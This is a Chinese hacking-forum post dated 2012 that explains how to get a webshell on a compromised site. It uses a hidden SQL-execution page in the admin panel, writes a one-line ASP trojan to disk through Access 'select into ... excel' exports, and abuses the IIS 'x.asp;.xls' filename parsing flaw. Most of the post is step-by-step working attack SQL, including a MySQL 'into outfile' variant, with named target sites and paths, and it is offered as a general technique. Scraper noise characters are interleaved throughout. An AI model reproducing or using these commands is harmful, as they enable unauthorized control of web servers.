好不容易进了后台,发现啥上传啊。备份啊多木有。2 y# n, N( v* V* u* P4 d+ b
webshell一直拿不到。后来翻了一下源码。有一个执行SQL命令的
9 N1 r2 Y$ f' X) j- N# M文件。可后台没显示这功能。直接填上文件名字,执行命令的选项出来了,' L9 B5 S- h* c3 N! |. Y c
然后就试用了下面的命令导出一句话木马。没想到成功了。命令方法如下:
! q G6 ]* a4 L4 s1.create table cmd (a varchar(50))
+ C; {- c R# I" u u6 x; o2 r2.insert into cmd (a) values (‘‘)$ \) |9 n; x3 h6 J
3.select * into [a] in ‘D:\wwwroot\www.koohik.com\hacker.asa;.xls’ ‘excel 4.0;’ from cmd% I3 O8 T: X/ x" M
(把表cmd的内容导出为物理路径的一个EXCEL文件)
7 T7 J' O# }+ C3 `) x- X7 N9 n* J6 t4.drop table cmd T" g# Y9 }: M) Z2 }7 u
利用IIS的BUG成功拿到了WEBSHELL。
, E, y4 A4 v; y/ R6 g# |+ j2 [ x. |; Q
直接菜刀里连接http://www.chouwazi.com/data/xiao.asp;xiao.xls一句话/ c) x, g d, ?( t4 Y
0 a. [" f7 b, B- d% E1 u# @
SQL语句意思解释:! f$ i! x4 q" G$ V9 W9 I* a
第一句
6 C2 z$ t! f2 f. o& u5 E 建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为50
$ J7 q ]5 h3 |5 k( v' T& V' e" h, Q' w, t; h' F) a( w
第二句
. N* s6 w; ?, T* n6 E5 s/ e 在表cmd的a字段插入一句话木马
9 `- J, d$ y2 K) B 第三句# p" Y: j" R% i" [3 E4 r6 T `7 Y5 d
把cmd表a的内容导出到路径e:\host\chouwazi.com\web\data\的EXCEL文件9 W s! C2 Y' z6 S* ?( o4 a
' q; ^% R0 W# R% ^9 ` 第四句. p2 W7 Z( d7 ~; P
删除建立的cmd表
& q$ S5 u$ R! {2 W2 x1 W) _9 v
( V5 c1 ]6 X2 |, r1 r 以下内容为测试:+ T& K& f! O" Z1 \" e3 K
Access利用后台SQL执行命令功能导出WebShell:
( J5 S/ d9 r- {9 S( |! G 这个更简单:
. ~" k- G2 R5 A/ | [ol][li]Select 'asp一句话木马' into [vote] in 'd:/chouwazi.com/x.asp;.xls' 'excel 8.0;' from vote [/li][/ol]) i9 v+ @/ ~: B8 P( r, w
或者* T+ x2 k$ \, u s/ E4 ^- I/ }0 `
[ol][li]Select 'php一句话木马' into outfile 'F:/wwwroot/chouwazi.com/eval.php'; [/li][/ol]* p$ }: _3 u/ b0 R
3 Z d J. @2 E3 B 后台有执行SQL语句功能(vote为已知表段)
. ^4 ^- s) n9 d3 U& n6 ?- N2 V+ k 希望对大家有所帮助拿shell的又一个思路
- I" d6 ^' }1 G& W( C' l$ {) @9 _% E |
发表于 2012-9-13 17:53:58
收藏
支持
反对